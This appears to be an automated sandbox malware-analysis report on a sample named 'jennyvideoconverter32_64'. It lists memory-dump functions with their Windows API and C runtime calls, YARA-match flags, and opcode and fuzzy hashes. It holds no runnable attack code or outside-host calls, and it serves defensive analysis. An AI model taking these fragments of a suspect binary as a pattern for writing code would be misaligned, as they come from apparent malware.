                                                                                  • Part of subcall function 02D98442: RtlEncodePointer.NTDLL(00000000), ref: 02D98445
                                                                                  • Part of subcall function 02D98442: __initp_misc_winsig.LIBCMT ref: 02D98460
                                                                                  • Part of subcall function 02D98442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02DB1578,00000008,00000003,02DB0F5C,?,00000001), ref: 02D991C1
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D991D5
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D991E8
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D991FB
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D9920E
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D99221
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D99234
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D99247
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D9925A
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D9926D
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D99280
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D99293
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D992A6
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D992B9
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D992CC
                                                                                  • Part of subcall function 02D98442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D992DF
                                                                                • __mtinitlocks.LIBCMT ref: 02D95CD9
                                                                                • __mtterm.LIBCMT ref: 02D95CE2
                                                                                  • Part of subcall function 02D95D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D98878
                                                                                  • Part of subcall function 02D95D4A: _free.LIBCMT ref: 02D9887F
                                                                                  • Part of subcall function 02D95D4A: RtlDeleteCriticalSection.NTDLL(02DB3978), ref: 02D988A1
                                                                                • __calloc_crt.LIBCMT ref: 02D95D07
                                                                                • __initptd.LIBCMT ref: 02D95D29
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D95D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 3567560977-0
                                                                                • Opcode ID: e10b3512c79dfe38c72bbfe5e069e09e708ce2a9d46d937eef7d623f6ea6afba
                                                                                • Instruction ID: d3b0366beb22616202f467ddc1498ebd92c104ca39c36364fc4650cea4d684a2
                                                                                • Opcode Fuzzy Hash: e10b3512c79dfe38c72bbfe5e069e09e708ce2a9d46d937eef7d623f6ea6afba
                                                                                • Instruction Fuzzy Hash: 1DF06D325583115EEF667AB87C4A64A2786EB02B34F600A69F465D93C0FF21DC419961
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D933B6,00000000), ref: 02D9341E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D93425
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D93431
                                                                                • RtlDecodePointer.NTDLL(00000001), ref: 02D9344E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 3489934621-340411864
                                                                                • Opcode ID: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                                                • Instruction ID: 5031ab4c812776ef9792b7fc398a8436a2d912c2e2cfa4515680e79e7586b6c7
                                                                                • Opcode Fuzzy Hash: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                                                • Instruction Fuzzy Hash: 0AE0E570ED0300EAFB215F72EC59F0A77B9B705B47F605860B406D5384DBB58C689B50
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933F3), ref: 02D934F3
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D934FA
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D93505
                                                                                • RtlDecodePointer.NTDLL(02D933F3), ref: 02D93520
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 3489934621-2819208100
                                                                                • Opcode ID: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                                                • Instruction ID: 932262e22bdd30f363e9606c674ac446cbf56d7e7b083b37a8c4f54a21b73b65
                                                                                • Opcode Fuzzy Hash: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                                                • Instruction Fuzzy Hash: BAE09271ED0300EBFB615FA1EC29F0A7BB9F704B06F201854F906E1384DBB89D249A54
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0000002A,9D194A3F,?,?,?,?,00000000,02DA69F8,000000FF,02D9210A), ref: 02D91EAA
                                                                                • TlsSetValue.KERNEL32(0000002A,02D9210A,?,?,00000000), ref: 02D91F17
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D91F41
                                                                                • HeapFree.KERNEL32(00000000), ref: 02D91F44
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapValue$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 1812714009-0
                                                                                • Opcode ID: 07940a74dc7a22d2f38c5de636bb399d6a00d46ceca0c404e695daa4f338b7ea
                                                                                • Instruction ID: adf1d39275addfe60286fd7db55e53b1a7c5c268341064bdd9644ee757c3bfa9
                                                                                • Opcode Fuzzy Hash: 07940a74dc7a22d2f38c5de636bb399d6a00d46ceca0c404e695daa4f338b7ea
                                                                                • Instruction Fuzzy Hash: 12518B36A4424A9FDB20DF29C848B2ABBE4FB45764F198658F86D973C0D770EC00CB91
                                                                                APIs
                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 02DA56D0
                                                                                • __FindPESection.LIBCMT ref: 02DA56EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                • String ID:
                                                                                • API String ID: 876702719-0
                                                                                • Opcode ID: 79c845d61ad4daa0db47f496e14b2c0fdb9f677182dfe899fd77c24e62c0dde3
                                                                                • Instruction ID: a223ce5fe67d2f3f91e0d9d2ea144eb5fdad561115f8eede5697729f8ecbfe53
                                                                                • Opcode Fuzzy Hash: 79c845d61ad4daa0db47f496e14b2c0fdb9f677182dfe899fd77c24e62c0dde3
                                                                                • Instruction Fuzzy Hash: 05A19076E00215CFDB25CF28E9A0FADB7A5FB44324F984669D855AB340E731EC00CB90
                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                                                • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                                                • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                                                • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                                                APIs
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D81CB1
                                                                                • CloseHandle.KERNEL32(?), ref: 02D81CBA
                                                                                • InterlockedExchangeAdd.KERNEL32(02DB7244,00000000), ref: 02D81CC6
                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 02D81CD4
                                                                                • QueueUserAPC.KERNEL32(02D81E7C,?,00000000), ref: 02D81CE1
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D81CEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1946104331-0
                                                                                • Opcode ID: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                                                • Instruction ID: 444e0c08a3edf9ccedb0f5df00490278d12f65bf01c3b529c15427105228a372
                                                                                • Opcode Fuzzy Hash: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                                                • Instruction Fuzzy Hash: 8EF04432940214BFE7105B96ED0ED5BFBBCEB85721B104A5DF66A82390DB709D14CB64
                                                                                APIs
                                                                                  • Part of subcall function 02D89A0C: __EH_prolog.LIBCMT ref: 02D89A11
                                                                                  • Part of subcall function 02D89A0C: _Allocate.LIBCPMT ref: 02D89A68
                                                                                  • Part of subcall function 02D89A0C: _memmove.LIBCMT ref: 02D89ABF
                                                                                • _memset.LIBCMT ref: 02D90879
                                                                                • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908E2
                                                                                • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                • String ID: Unknown error$invalid string position
                                                                                • API String ID: 1854462395-1837348584
                                                                                • Opcode ID: f587b2b1fc96edd9824c0af1712f86e835314b68236eb38d2a8c267e26b0c298
                                                                                • Instruction ID: 36203ac0a469a8136d56538ac56fa8622b1d558a179fa7a7aec995b9bd7de108
                                                                                • Opcode Fuzzy Hash: f587b2b1fc96edd9824c0af1712f86e835314b68236eb38d2a8c267e26b0c298
                                                                                • Instruction Fuzzy Hash: F051BC70208341DFEB14DF24D890B2EBBE5EB98749F54092EF48297791D771E948CBA2
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 004038C7
                                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                • API String ID: 1385375860-4131005785
                                                                                • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                                                • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D918BF
                                                                                  • Part of subcall function 02D92413: std::exception::_Copy_str.LIBCMT ref: 02D9242C
                                                                                  • Part of subcall function 02D90C90: __CxxThrowException@8.LIBCMT ref: 02D90CEE
                                                                                • std::exception::exception.LIBCMT ref: 02D9191E
                                                                                Strings
                                                                                • boost unique_lock owns already the mutex, xrefs: 02D9190D
                                                                                • boost unique_lock has no mutex, xrefs: 02D918AE
                                                                                • $, xrefs: 02D91923
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                • API String ID: 2140441600-46888669
                                                                                • Opcode ID: 3d2b4ab8f0332ae64a0387a7719e1d1ad5731f07111aa6328529e4922666c2a6
                                                                                • Instruction ID: 9c89bdf564ff23cb0b17a08eec86d70b3c10028a723b33f114aaa2dbd36f799d
                                                                                • Opcode Fuzzy Hash: 3d2b4ab8f0332ae64a0387a7719e1d1ad5731f07111aa6328529e4922666c2a6
                                                                                • Instruction Fuzzy Hash: 7C21D3B15083809FDB60DF24C554B5BBBE9BB89708F504A5EF8A587380D7B5D808CF92
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D949C0
                                                                                  • Part of subcall function 02D95BB2: GetLastError.KERNEL32(76230A60,7622F550,02D95DA0,02D92F73,7622F550,?,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95BB4
                                                                                  • Part of subcall function 02D95BB2: __calloc_crt.LIBCMT ref: 02D95BD5
                                                                                  • Part of subcall function 02D95BB2: __initptd.LIBCMT ref: 02D95BF7
                                                                                  • Part of subcall function 02D95BB2: GetCurrentThreadId.KERNEL32 ref: 02D95BFE
                                                                                  • Part of subcall function 02D95BB2: SetLastError.KERNEL32(00000000,02D8606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D86508), ref: 02D95C16
                                                                                • __calloc_crt.LIBCMT ref: 02D949E3
                                                                                • __get_sys_err_msg.LIBCMT ref: 02D94A01
                                                                                • __invoke_watson.LIBCMT ref: 02D94A1E
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D949CB, 02D949F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 109275364-798102604
                                                                                • Opcode ID: 50ae79790e424f859b8f72d1f4c245ae0f5f2a316d306698edc77ce26cb69b37
                                                                                • Instruction ID: b564133d0dddbeddae58c44ac2b1f11a456c87c950f0fb9512c32ceaad1bbe97
                                                                                • Opcode Fuzzy Hash: 50ae79790e424f859b8f72d1f4c245ae0f5f2a316d306698edc77ce26cb69b37
                                                                                • Instruction Fuzzy Hash: 0CF0E9327447157FEF216A2A9C40A2B729DEF41AA4F00067EFDC5D7302EB21DC5286A5
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                • GetLastError.KERNEL32 ref: 02D8237A
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID: pqcs
                                                                                • API String ID: 1619523792-2559862021
                                                                                • Opcode ID: 97b0c3abca7b4f8271297d0559353c2196d4e39b333f7f0be5ddcfc31f86f8c2
                                                                                • Instruction ID: 4a660f915e76d3cc0f1b59c90c66b52d81847c70f5b087f8956ef95cfab47d66
                                                                                • Opcode Fuzzy Hash: 97b0c3abca7b4f8271297d0559353c2196d4e39b333f7f0be5ddcfc31f86f8c2
                                                                                • Instruction Fuzzy Hash: ABF0BD71940304ABEB10AAB4D819FAFB7BCEB45701F104569E949D2240E770DD148BA5
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D84035
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D84042
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D84049
                                                                                • std::exception::exception.LIBCMT ref: 02D84063
                                                                                  • Part of subcall function 02D8A5FD: __EH_prolog.LIBCMT ref: 02D8A602
                                                                                  • Part of subcall function 02D8A5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A611
                                                                                  • Part of subcall function 02D8A5FD: __CxxThrowException@8.LIBCMT ref: 02D8A630
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3112922283-2104205924
                                                                                • Opcode ID: 243847f3e606a4ae0570d91b2d91848a8c9da38db7498a919b183264de8becb8
                                                                                • Instruction ID: 4f76a94a182c968dacd8ee88fbc6807b37fb462a7e08a0d5cacae1d02f5c03b2
                                                                                • Opcode Fuzzy Hash: 243847f3e606a4ae0570d91b2d91848a8c9da38db7498a919b183264de8becb8
                                                                                • Instruction Fuzzy Hash: 18F082B2D44209EBDB00EFE0D919FAFB778FB04301F904545E915A2340D7754A14CF65
                                                                                APIs
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                                                • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                                                • GetFileType.KERNEL32(00000000), ref: 00403836
                                                                                • SetHandleCount.KERNEL32 ref: 0040386D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType$CountInfoStartup
                                                                                • String ID:
                                                                                • API String ID: 1710529072-0
                                                                                • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                                                • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                                                APIs
                                                                                  • Part of subcall function 02D91990: CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D919E1
                                                                                  • Part of subcall function 02D91990: WaitForSingleObject.KERNEL32(?,000000FF,9D194A3F,?,?,?,?,9D194A3F,02D91963,9D194A3F), ref: 02D919F8
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C5E
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C7E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D91CB7
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D91D0B
                                                                                • SetEvent.KERNEL32(?), ref: 02D91D12
                                                                                  • Part of subcall function 02D8418C: CloseHandle.KERNEL32(00000000,?,02D91C45), ref: 02D841B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4166353394-0
                                                                                • Opcode ID: 3d20a1eac598a68d203fc7fd2a9a47f04f8cc49993df89f3fa4a82fa0ff703ec
                                                                                • Instruction ID: 3791935995e0732e0a2f63f21dc90a0195362187fc101ad4d9d198de33b7b794
                                                                                • Opcode Fuzzy Hash: 3d20a1eac598a68d203fc7fd2a9a47f04f8cc49993df89f3fa4a82fa0ff703ec
                                                                                • Instruction Fuzzy Hash: F0418C716403129BEF299F28DC80B2AB7A4EF45624F240668FC199B395D735DC11CBA5
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E030
                                                                                  • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AF
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D8E0CB
                                                                                • InterlockedIncrement.KERNEL32(02DB5180), ref: 02D8E0F0
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8E105
                                                                                  • Part of subcall function 02D827F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D8284E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                • String ID:
                                                                                • API String ID: 1578506061-0
                                                                                • Opcode ID: 5810ea39349dbcaa909bff89ef934c42d15730dde9b5a96591d308eb4fa3dff9
                                                                                • Instruction ID: 28840a30835bf7c28ff89f9c8b8e7a3a8e93d29aba1b605562228283bdf8e5cf
                                                                                • Opcode Fuzzy Hash: 5810ea39349dbcaa909bff89ef934c42d15730dde9b5a96591d308eb4fa3dff9
                                                                                • Instruction Fuzzy Hash: 2A3134B1901205EFCB10EFA9C544AAEBBF9FF08310F14895AE849D7740E735AA04CFA0
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02DA02F0
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • _free.LIBCMT ref: 02DA0303
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: d721a1eef0d738939521d0f9ce0b359041bcd83178ce019c731f54e3fa947bc7
                                                                                • Instruction ID: a6d664d346628e0313c3947bbe030724603b4c24c47f6778c66aa2c06306a1a9
                                                                                • Opcode Fuzzy Hash: d721a1eef0d738939521d0f9ce0b359041bcd83178ce019c731f54e3fa947bc7
                                                                                • Instruction Fuzzy Hash: 3211E532949615EFDF222FB4B868F5A3799DF05372F104929F9899A390DB31DC50CAE0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D821DA
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821ED
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D82224
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D82237
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D82261
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                  • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                  • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
